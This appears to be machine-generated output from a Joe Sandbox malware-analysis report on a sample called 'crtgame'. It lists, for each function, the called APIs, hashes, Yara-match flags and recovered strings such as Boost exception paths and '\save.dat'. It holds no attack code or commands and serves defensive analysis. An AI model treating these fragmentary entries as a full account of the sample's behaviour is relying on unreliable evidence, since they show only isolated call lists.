                                                                          • Opcode ID: 0e04a81b9141ca88b167d0826e06af69e245e4c04690733336a4fcceb580809f
                                                                          • Instruction ID: f8f8175c63987601617c45a663e68d1e647ab55cc515b0ed114fcb705529d527
                                                                          • Opcode Fuzzy Hash: 0e04a81b9141ca88b167d0826e06af69e245e4c04690733336a4fcceb580809f
                                                                          • Instruction Fuzzy Hash: E5312031A08246BFDF218E74C884BFA7BE6FF41364F0541A8E9628B590F734D891CB50
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 02BDFDB0
                                                                            • Part of subcall function 02BD29AC: __FF_MSGBANNER.LIBCMT ref: 02BD29C3
                                                                            • Part of subcall function 02BD29AC: __NMSG_WRITE.LIBCMT ref: 02BD29CA
                                                                            • Part of subcall function 02BD29AC: RtlAllocateHeap.NTDLL(00830000,00000000,00000001), ref: 02BD29EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap_malloc
                                                                          • String ID:
                                                                          • API String ID: 501242067-0
                                                                          • Opcode ID: e3ace542f9b6117b27f18d520e4f90d334bd9beb3bd0beeeb1bdbbe0dc35b72c
                                                                          • Instruction ID: fdd0b4adcc97a57479f432f7a0608310e6de90e528ab7565db1697589b2cd251
                                                                          • Opcode Fuzzy Hash: e3ace542f9b6117b27f18d520e4f90d334bd9beb3bd0beeeb1bdbbe0dc35b72c
                                                                          • Instruction Fuzzy Hash: 3A11A332848612EBCF312F71A8047EA7B9ADF143A1B1049B9E95F9B541FF3594508B94
                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02BD1D92
                                                                          • ___ascii_stricmp.LIBCMT ref: 02BD1DCA
                                                                          • __tolower_l.LIBCMT ref: 02BD1DE0
                                                                            • Part of subcall function 02BD537A: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02BD5388
                                                                            • Part of subcall function 02BD537A: __isctype_l.LIBCMT ref: 02BD53A9
                                                                          • __tolower_l.LIBCMT ref: 02BD1DEF
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Locale$UpdateUpdate::___tolower_l$___ascii_stricmp__isctype_l
                                                                          • String ID:
                                                                          • API String ID: 2995433114-0
                                                                          • Opcode ID: 45227b07271bb04968117c74aa6c8210f72f7e50330ca9abdaf3e931e9293719
                                                                          • Instruction ID: 24db88934e93fb41e7cc84a2cfcb1ec4be81c91a90e0c41700e3f703ff22d50b
                                                                          • Opcode Fuzzy Hash: 45227b07271bb04968117c74aa6c8210f72f7e50330ca9abdaf3e931e9293719
                                                                          • Instruction Fuzzy Hash: C111CA72914255AFD720AA7CC884BFA77BDEB01265F5406E8E42957180FB705D00C7A0
                                                                          APIs
                                                                          • htons.WS2_32(?), ref: 02BC3DA2
                                                                            • Part of subcall function 02BC3BD3: __EH_prolog.LIBCMT ref: 02BC3BD8
                                                                            • Part of subcall function 02BC3BD3: std::bad_exception::bad_exception.LIBCMT ref: 02BC3BED
                                                                          • htonl.WS2_32(00000000), ref: 02BC3DB9
                                                                          • htonl.WS2_32(00000000), ref: 02BC3DC0
                                                                          • htons.WS2_32(?), ref: 02BC3DD4
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                          • String ID:
                                                                          • API String ID: 3882411702-0
                                                                          • Opcode ID: 2936c20db4804ca5cc38d18d3c00e4875a68a78ac42b348cbbf969a8b6745758
                                                                          • Instruction ID: 6c8a0475bfc90804dbebacfe6b795051ea9094f62acf88bdd8a92720c73ed8d5
                                                                          • Opcode Fuzzy Hash: 2936c20db4804ca5cc38d18d3c00e4875a68a78ac42b348cbbf969a8b6745758
                                                                          • Instruction Fuzzy Hash: EE118E75A10309EFCF019F64D885A5AB7B9FF09310F10C49AFC05DF205DA719A54DBA1
                                                                          APIs
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000001,?,?,00000001,?,?,02BC335F,?,?,?,?,?), ref: 02BC23D0
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02BC23DE
                                                                          • InterlockedExchange.KERNEL32(00000030,00000001), ref: 02BC2401
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC2408
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 4018804020-0
                                                                          • Opcode ID: accc5951eb9d9dba4347cc080dedd580e4822757cd0c777a5534b3b586685800
                                                                          • Instruction ID: cd73a8f3c13957110ab63746c472302d68f73c737143cf59949d9d571e9ec44b
                                                                          • Opcode Fuzzy Hash: accc5951eb9d9dba4347cc080dedd580e4822757cd0c777a5534b3b586685800
                                                                          • Instruction Fuzzy Hash: D511CE71600204EFEB209F60C984B66BBB9FF40754F2044ADFA019B141DBB1E941DBA0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                          • String ID:
                                                                          • API String ID: 3016257755-0
                                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction ID: b96c431edb7ea4623c84e690397e44816f52c86bba26b3deee509fcd6184f479
                                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction Fuzzy Hash: F1014B3204014ABBCF166ED4CC41AEE3F23BF09754B488496FE6899035E336C9B1EB85
                                                                          APIs
                                                                          • ___BuildCatchObject.LIBCMT ref: 02BDB744
                                                                            • Part of subcall function 02BDBD5B: ___AdjustPointer.LIBCMT ref: 02BDBDA4
                                                                          • _UnwindNestedFrames.LIBCMT ref: 02BDB75B
                                                                          • ___FrameUnwindToState.LIBCMT ref: 02BDB76D
                                                                          • CallCatchBlock.LIBCMT ref: 02BDB791
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                          • String ID:
                                                                          • API String ID: 2633735394-0
                                                                          • Opcode ID: bf7e6a2e7c15418c5902c0973dae014681d9a77571f4c99d076f4f289f483f1c
                                                                          • Instruction ID: fad0c730f91ac828f52f8c6c02e1d1a376e9f1863eb2f0dc4fe176d6ce372e75
                                                                          • Opcode Fuzzy Hash: bf7e6a2e7c15418c5902c0973dae014681d9a77571f4c99d076f4f289f483f1c
                                                                          • Instruction Fuzzy Hash: E001E532000109BBCF12AF55CC44EEA3FBAEF48758F068055FE5866120E772E861DFA0
                                                                          APIs
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02BC24A9
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02BC24B8
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC24CD
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC24D4
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 4018804020-0
                                                                          • Opcode ID: a0909bf1e60bec07f8fa4e9877fde4158e29c503f84cc71bda68f6d3e4188c1a
                                                                          • Instruction ID: 8fef9b642b58262962fc4911600f8aa381befab4f337380a85a69c0315ac391f
                                                                          • Opcode Fuzzy Hash: a0909bf1e60bec07f8fa4e9877fde4158e29c503f84cc71bda68f6d3e4188c1a
                                                                          • Instruction Fuzzy Hash: 2BF03C72640204EFDB00AF65EC84F9ABBACFF44750F004469FA04CB142DB71E5618FA1
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC2009
                                                                          • RtlDeleteCriticalSection.NTDLL(?), ref: 02BC2028
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BC2037
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BC204E
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                          • String ID:
                                                                          • API String ID: 2456309408-0
                                                                          • Opcode ID: 9fb15893c440db2caa14979de737ff1f0fa8f4f0446bbee7191ebae5bc12e1cc
                                                                          • Instruction ID: 73d0770293052724c6c688db24e72541c66209901f1362a05ed39521d553e667
                                                                          • Opcode Fuzzy Hash: 9fb15893c440db2caa14979de737ff1f0fa8f4f0446bbee7191ebae5bc12e1cc
                                                                          • Instruction Fuzzy Hash: AA01DC31400608DBCB34AF54E808B9AFBF8EF04309F1049AEE84682990CFB4A988DF54
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Event$H_prologSleep
                                                                          • String ID:
                                                                          • API String ID: 1765829285-0
                                                                          • Opcode ID: 3971878ab869a89a0c61e728b79e1c4fd77043cb1bdb3ebc0134cb1bf5086f64
                                                                          • Instruction ID: e3efc7ecbb0d4c6da70ca95faf2edb41f02db64911982599acba68cfd7c0837b
                                                                          • Opcode Fuzzy Hash: 3971878ab869a89a0c61e728b79e1c4fd77043cb1bdb3ebc0134cb1bf5086f64
                                                                          • Instruction Fuzzy Hash: ECF03036640114EFCF00DF94D888B88BBB5FF09311F1481A9F51A9B291CB759854DB51
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02BC7D5C,?,?,00000000), ref: 02BC9059
                                                                          • getsockname.WS2_32(?,?,?), ref: 02BC906F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastgetsockname
                                                                          • String ID: &'
                                                                          • API String ID: 566540725-655172784
                                                                          • Opcode ID: ac63fc49ed2435d374a3cc27f05ecd4a697333114e49aae3961660f8d9b59ac1
                                                                          • Instruction ID: 9d458da27bc8b58cb4d3dcfe4c18aaff08b1c42d17a7e9102addb26b9c26e52b
                                                                          • Opcode Fuzzy Hash: ac63fc49ed2435d374a3cc27f05ecd4a697333114e49aae3961660f8d9b59ac1
                                                                          • Instruction Fuzzy Hash: EB216571A00248DFDB10DF68D844ADEB7F5FF4C324F2185AAE918EB241E730E9458B51
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BCC63D
                                                                            • Part of subcall function 02BCCC19: std::exception::exception.LIBCMT ref: 02BCCC48
                                                                            • Part of subcall function 02BCD3D2: __EH_prolog.LIBCMT ref: 02BCD3D7
                                                                            • Part of subcall function 02BD354C: _malloc.LIBCMT ref: 02BD3564
                                                                            • Part of subcall function 02BCCC78: __EH_prolog.LIBCMT ref: 02BCCC7D
                                                                          Strings
                                                                          • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02BCC673
                                                                          • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02BCC67A
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$_mallocstd::exception::exception
                                                                          • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                          • API String ID: 1953324306-1943798000
                                                                          • Opcode ID: bef74ad580cb916b34aed84d4045948a60aed4548ffd3f3b54719ee20a4431cb
                                                                          • Instruction ID: 4aaf755ede35280d8cefbe3bfb2f290cf037e18b7762a806e5ae1f9ded2116db
                                                                          • Opcode Fuzzy Hash: bef74ad580cb916b34aed84d4045948a60aed4548ffd3f3b54719ee20a4431cb
                                                                          • Instruction Fuzzy Hash: F9219F71E002589BDF04EFE8D554AEEBBB5EF54704F1044DEE90AA7281DB705A44CF51
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BCC732
                                                                            • Part of subcall function 02BCCCF0: std::exception::exception.LIBCMT ref: 02BCCD1D
                                                                            • Part of subcall function 02BCD509: __EH_prolog.LIBCMT ref: 02BCD50E
                                                                            • Part of subcall function 02BD354C: _malloc.LIBCMT ref: 02BD3564
                                                                            • Part of subcall function 02BCCD4D: __EH_prolog.LIBCMT ref: 02BCCD52
                                                                          Strings
                                                                          • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02BCC76F
                                                                          • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02BCC768
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$_mallocstd::exception::exception
                                                                          • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                          • API String ID: 1953324306-412195191
                                                                          • Opcode ID: c6075614deed7425577e6e4decf7b831104598842fb36945b07c132c553f32b7
                                                                          • Instruction ID: e7ad76c64c0f0fd59e284539c72ec6b7c328d16b0dd182f54686ffc418bd0227
                                                                          • Opcode Fuzzy Hash: c6075614deed7425577e6e4decf7b831104598842fb36945b07c132c553f32b7
                                                                          • Instruction Fuzzy Hash: 7121AD71E002089BDF04EFE8D450AEEBFB5EF54704F2444DEE90AAB241DB705A04CB91
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 02BC5288
                                                                            • Part of subcall function 02BD29AC: __FF_MSGBANNER.LIBCMT ref: 02BD29C3
                                                                            • Part of subcall function 02BD29AC: __NMSG_WRITE.LIBCMT ref: 02BD29CA
                                                                            • Part of subcall function 02BD29AC: RtlAllocateHeap.NTDLL(00830000,00000000,00000001), ref: 02BD29EF
                                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00002000,00000000,00000001,00000000,00000000,?,02BC75B2), ref: 02BC529A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                          • String ID: \save.dat
                                                                          • API String ID: 4128168839-3580179773
                                                                          • Opcode ID: c2341c80e4fa4f4a1902170bf02966ec31b6c99fce38ed9ab4b6024b772415f4
                                                                          • Instruction ID: 11f7afdab5a252b24362d3f52e79b6cf7d5066a1bc2b4d197447392888030999
                                                                          • Opcode Fuzzy Hash: c2341c80e4fa4f4a1902170bf02966ec31b6c99fce38ed9ab4b6024b772415f4
                                                                          • Instruction Fuzzy Hash: 041190329042016BDB359E658C80EAFFFABDFC265072401FCE8856B206D7A32D02C7E1
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC396A
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 02BC39C1
                                                                            • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                            • Part of subcall function 02BC9FA7: __EH_prolog.LIBCMT ref: 02BC9FAC
                                                                            • Part of subcall function 02BC9FA7: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02BC9FBB
                                                                            • Part of subcall function 02BC9FA7: __CxxThrowException@8.LIBCMT ref: 02BC9FDA
                                                                          Strings
                                                                          • Day of month is not valid for year, xrefs: 02BC39AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Day of month is not valid for year
                                                                          • API String ID: 1404951899-1521898139
                                                                          • Opcode ID: 1b220dacf9a442a0cc0ab21fb72d7e2b9df5c61dafc1a6dceefbdf204fe0b4e6
                                                                          • Instruction ID: 317e943556ecc81768ef5bc1fae124a464621664860303c9de3144e66c905495
                                                                          • Opcode Fuzzy Hash: 1b220dacf9a442a0cc0ab21fb72d7e2b9df5c61dafc1a6dceefbdf204fe0b4e6
                                                                          • Instruction Fuzzy Hash: DF01B176910209AEDF04EFA4D801AEEB779FF18710F50409EFC05A3210EB708A45CB95
                                                                          APIs
                                                                          • std::exception::exception.LIBCMT ref: 02BCF510
                                                                          • __CxxThrowException@8.LIBCMT ref: 02BCF525
                                                                            • Part of subcall function 02BD354C: _malloc.LIBCMT ref: 02BD3564
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                          • String ID: bad allocation
                                                                          • API String ID: 4063778783-2104205924
                                                                          • Opcode ID: a196cfdbb2ee219d5c1af8babf1a096556d833534d733b103b9be2fcacaf4849
                                                                          • Instruction ID: 23f38ee7bbbd0f49840572ec5df68296013f846ca1b38d583585dfa1e9e827ca
                                                                          • Opcode Fuzzy Hash: a196cfdbb2ee219d5c1af8babf1a096556d833534d733b103b9be2fcacaf4849
                                                                          • Instruction Fuzzy Hash: BFF0277160030EA7DF08AAACC9119FF73ECDB00700B6005EAF426D21C2FB70E6008981
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC3C1B
                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 02BC3C30
                                                                            • Part of subcall function 02BD1EB7: std::exception::exception.LIBCMT ref: 02BD1EC1
                                                                            • Part of subcall function 02BC9FE0: __EH_prolog.LIBCMT ref: 02BC9FE5
                                                                            • Part of subcall function 02BC9FE0: __CxxThrowException@8.LIBCMT ref: 02BCA00E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                          • String ID: bad cast
                                                                          • API String ID: 1300498068-3145022300
                                                                          • Opcode ID: 01e139fab208735ed3c482902f32088f9df9cf84626a16f20a9a0f9fb0bf9ddb
                                                                          • Instruction ID: 610e38f9491203020da95eb5e1e192a0e6ff260bdedf8a611885f7a0b1c611f3
                                                                          • Opcode Fuzzy Hash: 01e139fab208735ed3c482902f32088f9df9cf84626a16f20a9a0f9fb0bf9ddb
                                                                          • Instruction Fuzzy Hash: FEF0A0729005088BCB19DF58D440AEEB775EF52315F1041EEED0A5B251DBB29A46DBD0
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC3886
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 02BC38A5
                                                                            • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                          Strings
                                                                          • Day of month value is out of range 1..31, xrefs: 02BC3894
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Day of month value is out of range 1..31
                                                                          • API String ID: 2067857976-1361117730
                                                                          • Opcode ID: b11be5ce59feabdedf8539d1497f5a4c4f26262a4c05a40d09a32e00d9625ac5
                                                                          • Instruction ID: 00fbaa0677e52de0e6c78006f9eb9cf6221b8002aa00ca52755a38a3916927a4
                                                                          • Opcode Fuzzy Hash: b11be5ce59feabdedf8539d1497f5a4c4f26262a4c05a40d09a32e00d9625ac5
                                                                          • Instruction Fuzzy Hash: 37E09272A0010497DB24AB9888117DDB7B9DB08710F1444DEE80273280DBB119449B91
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC38D2
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 02BC38F1
                                                                            • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                          Strings
                                                                          • Year is out of valid range: 1400..10000, xrefs: 02BC38E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Year is out of valid range: 1400..10000
                                                                          • API String ID: 2067857976-2344417016
                                                                          • Opcode ID: a5ab4cbe12df570b14d0de107a26904c1deed9f9ca03fea7d3830d8a932ae2e1
                                                                          • Instruction ID: 18e473955a110fc8369164e4a60e52641058710cd275a662bd69e572a16074c5
                                                                          • Opcode Fuzzy Hash: a5ab4cbe12df570b14d0de107a26904c1deed9f9ca03fea7d3830d8a932ae2e1
                                                                          • Instruction Fuzzy Hash: 28E0D872B0010497DF24FB98C8117DDB7BADB08710F1440DEE80267280DFB11944CF91
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC391E
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 02BC393D
                                                                            • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                          Strings
                                                                          • Month number is out of range 1..12, xrefs: 02BC392C
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Month number is out of range 1..12
                                                                          • API String ID: 2067857976-4198407886
                                                                          • Opcode ID: a6ac227c7d81b17df03ee369769bcc9ded8232db56fc18916fe4002cfa54e6af
                                                                          • Instruction ID: 77626b16424fa49ba82ed73a326971060e0e8ba97d3404a3f89c96ef8a5d88ba
                                                                          • Opcode Fuzzy Hash: a6ac227c7d81b17df03ee369769bcc9ded8232db56fc18916fe4002cfa54e6af
                                                                          • Instruction Fuzzy Hash: B5E0D872B4011497DB24FB98C8117DDB7BADB08710F1441DEE80263280DFB15944CF91
                                                                          APIs
                                                                          • TlsAlloc.KERNEL32 ref: 02BC19CC
                                                                          • GetLastError.KERNEL32 ref: 02BC19D9
                                                                            • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocErrorH_prologLast
                                                                          • String ID: tss
                                                                          • API String ID: 249634027-1638339373
                                                                          • Opcode ID: c0c6057fe4737b0a859ba8ef7337bf6704c98b953d9a6fcca1885bdd56ea118b
                                                                          • Instruction ID: 14be3c7eb4623ddb6006fee91d0b5057958e6b196ee7eab9e8e92284adccf775
                                                                          • Opcode Fuzzy Hash: c0c6057fe4737b0a859ba8ef7337bf6704c98b953d9a6fcca1885bdd56ea118b
                                                                          • Instruction Fuzzy Hash: 15E08632D142145BC6007B7C980808AFBA49B44274F204BAAEDADD73D1FF3089559BC7
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC3BD8
                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 02BC3BED
                                                                            • Part of subcall function 02BD1EB7: std::exception::exception.LIBCMT ref: 02BD1EC1
                                                                            • Part of subcall function 02BC9FE0: __EH_prolog.LIBCMT ref: 02BC9FE5
                                                                            • Part of subcall function 02BC9FE0: __CxxThrowException@8.LIBCMT ref: 02BCA00E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                          • String ID: bad cast
                                                                          • API String ID: 1300498068-3145022300
                                                                          • Opcode ID: 58c3a8534363d138ac353b72ba65cf3700f49a15c2b93d845205cdea55c0e55a
                                                                          • Instruction ID: 934fee4f855054b5d71368c85fd99eaa57f00eb03e2d0318128398670c171e87
                                                                          • Opcode Fuzzy Hash: 58c3a8534363d138ac353b72ba65cf3700f49a15c2b93d845205cdea55c0e55a
                                                                          • Instruction Fuzzy Hash: 89E0D6B1A00108DBCB28EF68D101BBCBBB1EF24308F1080ECA80A4B290DB311A06CF81